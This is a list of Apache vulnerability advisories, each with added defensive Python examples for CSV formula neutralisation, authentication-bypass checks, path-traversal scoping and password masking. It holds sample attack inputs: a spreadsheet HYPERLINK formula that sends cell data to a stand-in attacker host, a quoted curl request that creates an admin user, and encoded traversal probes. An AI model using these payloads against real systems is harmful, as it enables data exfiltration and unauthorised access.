
CVSS: 7.5 | EPSS: 43% | CPEs: 3 | EXPL: 3

09 Mar 2025 — Bypass/Injection vulnerability in Apache Camel-Bean component under particular conditions. This issue affects Apache Camel: from 4.10.0 through <= 4.10.1, from 4.8.0 through <= 4.8.4, from 3.10.0 through <= 3.22.3. Users are recommended to upgrade to version 4.10.2 for 4.10.x LTS, 4.8.5 for 4.8.x LTS and 3.22.4 for 3.x releases. This vulnerability is only present in the following situation. The user is using one of the following HTTP Servers via one of the following Camel components * camel-servlet * ca... • https://github.com/akamai/CVE-2025-27636-Apache-Camel-PoC • CWE-178: Improper Handling of Case Sensitivity CWE-644: Improper Neutralization of HTTP Headers for Scripting Syntax •

CVSS: 6.4 | EPSS: 0% | CPEs: 3 | EXPL: 0

06 Mar 2025 — Improper Input Validation vulnerability in Apache Traffic Server. This issue affects Apache Traffic Server: from 8.0.0 through 8.1.11, from 9.0.0 through 9.2.8, from 10.0.0 through 10.0.3. Users are recommended to upgrade to version 9.2.9 or 10.0.4, which fixes the issue. Several vulnerabilities were discovered in Apache Traffic Server, a reverse and forward proxy server, which could result in denial of service, HTTP request smuggling, cache poisoning or incomplete dropping of privileges. • https://lists.apache.org/thread/btofzws2yqskk2n7f01r3l1819x01023 • CWE-20: Improper Input Validation •

CVSS: 7.5 | EPSS: 0% | CPEs: 2 | EXPL: 0

06 Mar 2025 — Improper Access Control vulnerability in Apache Traffic Server. This issue affects Apache Traffic Server: from 9.2.0 through 9.2.8, from 10.0.0 through 10.0.3. Users are recommended to upgrade to version 9.2.9 or 10.0.4, which fixes the issue. Several vulnerabilities were discovered in Apache Traffic Server, a reverse and forward proxy server, which could result in denial of service, HTTP request smuggling, cache poisoning or incomplete dropping of privileges. • https://lists.apache.org/thread/btofzws2yqskk2n7f01r3l1819x01023 • CWE-284: Improper Access Control •

CVSS: 7.5 | EPSS: 0% | CPEs: 1 | EXPL: 0

06 Mar 2025 — Improper Access Control vulnerability in Apache Traffic Server. This issue affects Apache Traffic Server: from 10.0.0 through 10.0.3. Users are recommended to upgrade to version 10.0.4, which fixes the issue. • https://lists.apache.org/thread/btofzws2yqskk2n7f01r3l1819x01023 • CWE-284: Improper Access Control •

CVSS: 7.5 | EPSS: 0% | CPEs: 2 | EXPL: 0

06 Mar 2025 — Expected Behavior Violation vulnerability in Apache Traffic Server. This issue affects Apache Traffic Server: from 9.0.0 through 9.2.8, from 10.0.0 through 10.0.3. Users are recommended to upgrade to version 9.2.9 or 10.0.4 or newer, which fix the issue. Several vulnerabilities were discovered in Apache Traffic Server, a reverse and forward proxy server, which could result in denial of service, HTTP request smuggling, cache poisoning or incomplete dropping of privileges. • https://lists.apache.org/thread/btofzws2yqskk2n7f01r3l1819x01023 • CWE-440: Expected Behavior Violation •

CVSS: 9.8 | EPSS: 0% | CPEs: 1 | EXPL: 0

03 Mar 2025 — Improper Neutralization of Formula Elements in Export CSV feature of Apache Ranger in Apache Ranger Version < 2.6.0. Users are recommended to upgrade to version 2.6.0, which fixes this issue. • https://cwiki.apache.org/confluence/display/RANGER/Vulnerabilities+found+in+Ranger • CWE-1236: Improper Neutralization of Formula Elements in a CSV File •
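What neutralizing formula elements in a CSV export looks like in practice, as an added example (this is not Apache Ranger's code; the policy rows, field names and the `neutralize_cell` / `export_csv` helpers are constructed for illustration):

```python
"""Added example, not Apache Ranger code.

Neutralising formula elements (CWE-1236) in a CSV export: a cell whose first
non-blank character is one of = + - @ or a tab/CR is prefixed with a single
quote so spreadsheet software reads it as text.  The policy rows below are
constructed sample data.
"""
import csv
import io

# Characters that make Excel / LibreOffice / Google Sheets evaluate a cell.
FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")


def neutralize_cell(value) -> str:
    """Return `value` as a string that no spreadsheet will treat as a formula.

    Leading whitespace is skipped before the test, which is deliberately
    conservative: some importers strip it before interpreting the cell.
    Legitimate negative numbers such as '-5' are also quoted; emit numeric
    columns as numbers from the caller if that matters.
    """
    text = "" if value is None else str(value)
    if text.lstrip().startswith(FORMULA_TRIGGERS):
        return "'" + text
    return text


def export_csv(header, rows) -> str:
    """Write header and rows with every cell neutralised and fully quoted,
    so embedded commas, quotes or newlines cannot start a new field."""
    buf = io.StringIO()
    writer = csv.writer(buf, quoting=csv.QUOTE_ALL, lineterminator="\n")
    writer.writerow(header)
    for row in rows:
        writer.writerow([neutralize_cell(cell) for cell in row])
    return buf.getvalue()


# Constructed sample: one benign policy and one whose description field was
# submitted as a spreadsheet formula.  Only a *leading* trigger character is
# neutralised; "db=sales" stays as it is.
SAMPLE_HEADER = ["policy", "resource", "description"]
SAMPLE_ROWS = [
    ["hive-default", "db=sales", "read-only for analysts"],
    ["hive-evil", "db=sales", '=HYPERLINK("http://attacker.example/?"&A1,"open")'],
]

if __name__ == "__main__":
    print(export_csv(SAMPLE_HEADER, SAMPLE_ROWS))
```

The quote prefix is the OWASP-recommended neutralisation; the exported cell then displays as `'=HYPERLINK(...)` rather than being evaluated when a reviewer opens the file in a spreadsheet.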

CVSS: 6.8 | EPSS: 0% | CPEs: 1 | EXPL: 0

03 Mar 2025 — Improper privilege management in a REST interface allowed registered users to access unauthorized resources if the resource ID was known. This issue affects Apache StreamPipes: through 0.95.1. Users are recommended to upgrade to version 0.97.0 which fixes the issue. • https://lists.apache.org/thread/j14w6wghlwwrgfgc6hoz9f94fwxtlgzh • CWE-269: Improper Privilege Management •

CVSS: 9.8 | EPSS: 4% | CPEs: 1 | EXPL: 0

03 Mar 2025 — Authentication bypass issue: if the request path does not contain "/" and does contain ".", authentication is not required. Expected (normal) request and response example: curl -X POST -H "Content-Type: application/json" -d {\"username\":\"hack2\",\"password\":\"hack\",\"component\":\"CONTROLLER\",\"role\":\"ADMIN\",\"tables\":[],\"permissions\":[],\"usernameWithComponent\":\"hack_CONTROLLER\"} http://{server_ip}:9000/users Return: {"code":401,"error":"HTTP 401 Unauthorized"} Malicious request and response example: curl -X POST -... • https://lists.apache.org/thread/ksf8qsndr1h66otkbjz2wrzsbw992r8v • CWE-288: Authentication Bypass Using an Alternate Path or Channel •
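The rule quoted above (no "/" in the path plus a "." means no authentication) is the kind of static-asset shortcut that becomes an alternate path around the login check. The following is an added example, not Apache Pinot's code: it models that rule as described and places a deny-by-default check beside it. The public-endpoint list, static-asset directory and every path are constructed for illustration, and paths are assumed to arrive with the leading "/" already stripped, as a JAX-RS style resource path would.

```python
"""Added example, not Apache Pinot's own code.

Models the exemption rule the advisory quotes ("if the path does not contain
'/' and contains '.', authentication is not required") beside a hardened,
deny-by-default check.  Paths are given with the leading '/' already
stripped (assumption).  All paths and allow-lists are constructed.
"""
import posixpath
from urllib.parse import unquote

# Assumed: endpoints that legitimately need no credentials.
PUBLIC_PATHS = frozenset({"/", "/health", "/index.html"})
# Assumed: static-asset directory and suffixes the '.'-based rule was
# presumably meant to cover.
STATIC_DIR = "/static/"
STATIC_SUFFIXES = (".js", ".css", ".png", ".ico", ".html")


def requires_auth_vulnerable(path: str) -> bool:
    """The rule as described: any '/'-free path containing a '.' skips auth.

    Meant for top-level files such as 'index.html', it also exempts an API
    resource name with a dot appended, because nothing checks that the path
    names a real static asset.
    """
    if "/" not in path and "." in path:
        return False
    return True


def canonical_path(raw_path: str) -> str:
    """Canonicalise before authorising: drop the query string, percent-decode,
    discard matrix parameters (';key=value' on a segment) and collapse '.'
    and '..' segments, so the string compared is the one the router acts on."""
    path = unquote(raw_path.split("?", 1)[0])
    segments = [seg.split(";", 1)[0] for seg in path.split("/")]
    return posixpath.normpath("/" + "/".join(segments))


def requires_auth_hardened(raw_path: str) -> bool:
    """Deny by default: only an explicit public endpoint or a static asset
    under STATIC_DIR with an expected suffix is exempt."""
    path = canonical_path(raw_path)
    if path in PUBLIC_PATHS:
        return False
    if path.startswith(STATIC_DIR) and path.endswith(STATIC_SUFFIXES):
        return False
    return True


if __name__ == "__main__":
    # Constructed probes: the second is the shape the quoted rule lets through.
    for p in ("users", "users.", "index.html", "static/app.js",
              "static/../users.", "static/%2e%2e/users.", "users;."):
        print(f"{p!r:24} vulnerable={requires_auth_vulnerable(p)!s:5} "
              f"hardened={requires_auth_hardened(p)}")
```

The point of `canonical_path` is that the authorization decision and the resource router must see the same string; percent-decoding, matrix parameters and dot segments are the usual ways those two views diverge.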

CVSS: 9.8 | EPSS: 0% | CPEs: 1 | EXPL: 0

28 Feb 2025 — Relative Path Traversal vulnerability in Apache Commons VFS before 2.10.0. The FileObject API in Commons VFS has a 'resolveFile' method that takes a 'scope' parameter. Specifying 'NameScope.DESCENDENT' promises that "an exception is thrown if the resolved file is not a descendent of the base file". However, when the path contains encoded ".." characters (for example, "%2E%2E/bar.txt"), it might return file objects that are not a descendent of the base file, without throwing an exception. This issue affects ... • https://lists.apache.org/thread/cnzqowyw9r2pl263cylmxhnvh41hyjcb • CWE-23: Relative Path Traversal •
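A scope check of the DESCENDENT kind described above, written as an added example in Python rather than taken from Commons VFS. `resolve_descendant_naive` compares the name exactly as given, so "%2E%2E/bar.txt" passes and only becomes "../bar.txt" when a lower layer decodes it; `resolve_descendant` decodes first. The function names, the `ScopeViolation` class and the base path are this example's own.

```python
"""Added example, not Apache Commons VFS code.

A descendant-scope check modelled on the contract quoted in the advisory:
resolution must fail unless the result is strictly below the base.  The
naive variant shows how a percent-encoded '..' slips past a check that runs
before decoding.  Names and paths here are constructed.
"""
import posixpath
from urllib.parse import unquote


class ScopeViolation(ValueError):
    """Resolved path is not a descendant of the base."""


def _is_strict_descendant(base: str, candidate: str) -> bool:
    base = posixpath.normpath(base)
    prefix = base.rstrip("/") + "/"
    return candidate != base and candidate.startswith(prefix)


def resolve_descendant_naive(base: str, name: str) -> str:
    """Checks the name exactly as given.  To normpath, '%2E%2E' is an
    ordinary segment, so the check passes; once something downstream
    decodes the returned path it points outside the base."""
    candidate = posixpath.normpath(posixpath.join(base, name))
    if not _is_strict_descendant(base, candidate):
        raise ScopeViolation(f"{name!r} is not a descendant of {base!r}")
    return candidate


def resolve_descendant(base: str, name: str) -> str:
    """Decode once, reject absolute names, normalise, then compare.

    Decode exactly as many times as the layers below will; otherwise the
    check and the file system disagree about which path is meant."""
    decoded = unquote(name)
    if decoded.startswith("/"):
        raise ScopeViolation(f"{name!r} is absolute")
    candidate = posixpath.normpath(posixpath.join(base, decoded))
    if not _is_strict_descendant(base, candidate):
        raise ScopeViolation(f"{name!r} escapes {base!r}")
    return candidate


def is_in_scope(base: str, name: str) -> bool:
    """Boolean wrapper around resolve_descendant for callers that only
    need an accept/reject answer."""
    try:
        resolve_descendant(base, name)
        return True
    except ScopeViolation:
        return False


if __name__ == "__main__":
    base = "/srv/data/app"
    leaked = resolve_descendant_naive(base, "%2E%2E/bar.txt")
    print("naive accepted:", leaked,
          "-> after decoding:", posixpath.normpath(unquote(leaked)))
    for name in ("docs/readme.txt", "%2E%2E/bar.txt", "../bar.txt",
                 "%2Fetc%2Fpasswd", "."):
        try:
            print(f"{name!r:20} -> {resolve_descendant(base, name)}")
        except ScopeViolation as exc:
            print(f"{name!r:20} -> rejected: {exc}")
```

Note that "." is rejected as well: DESCENDENT promises a strict descendant, and the base itself does not qualify.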

CVSS: 7.5 | EPSS: 0% | CPEs: 1 | EXPL: 0

28 Feb 2025 — Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Apache Commons VFS. The FtpFileObject class can throw an exception when a file is not found, revealing the original URI in its message, which may include a password. The fix is to mask the password in the exception message. This issue affects Apache Commons VFS: before 2.10.0. Users are recommended to upgrade to version 2.10.0, which fixes the issue. • https://issues.apache.org/jira/browse/VFS-169 • CWE-200: Exposure of Sensitive Information to an Unauthorized Actor •
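Masking the password before the URI reaches an exception message or a log line, as an added example (not Commons VFS code; `mask_uri_password`, the `FileNotFoundAtUri` class and the sample URIs are this example's own):

```python
"""Added example, not Apache Commons VFS code.

Masks the password component of a URI so that an exception raised for a
missing file, or a log line built from the same URI, never carries the
credential.  Helper and class names are this example's own; URIs are
constructed.
"""
from urllib.parse import urlsplit, urlunsplit


def mask_uri_password(uri: str, mask: str = "***") -> str:
    """Replace the password in 'scheme://user:pass@host/...' with `mask`.

    Scheme, user, host, port, path, query and fragment are kept.  A URI
    without a password is returned unchanged.  Caveat: urlsplit lower-cases
    the host, so the masked string is for messages, not for reconnecting.
    """
    parts = urlsplit(uri)
    if parts.password is None:
        return uri
    host = parts.hostname or ""
    if ":" in host:            # IPv6 literal: urlsplit strips the brackets
        host = f"[{host}]"
    if parts.port is not None:
        host = f"{host}:{parts.port}"
    netloc = f"{parts.username or ''}:{mask}@{host}"
    return urlunsplit((parts.scheme, netloc, parts.path, parts.query, parts.fragment))


class FileNotFoundAtUri(FileNotFoundError):
    """Not-found error whose message is built from the masked URI only."""

    def __init__(self, uri: str):
        self.masked_uri = mask_uri_password(uri)
        super().__init__(f"Could not find file: {self.masked_uri}")


def not_found_message(uri: str) -> str:
    """The error text a caller would log or return for a missing file."""
    return str(FileNotFoundAtUri(uri))


if __name__ == "__main__":
    # Constructed URIs: one with embedded credentials, one without.
    for u in ("ftp://alice:s3cret@ftp.example.com:2121/dir/file.txt",
              "ftp://ftp.example.com/pub/x.txt"):
        print(not_found_message(u))
```

The masking happens in the exception constructor rather than at each call site, so a new code path that raises the same error cannot reintroduce the leak.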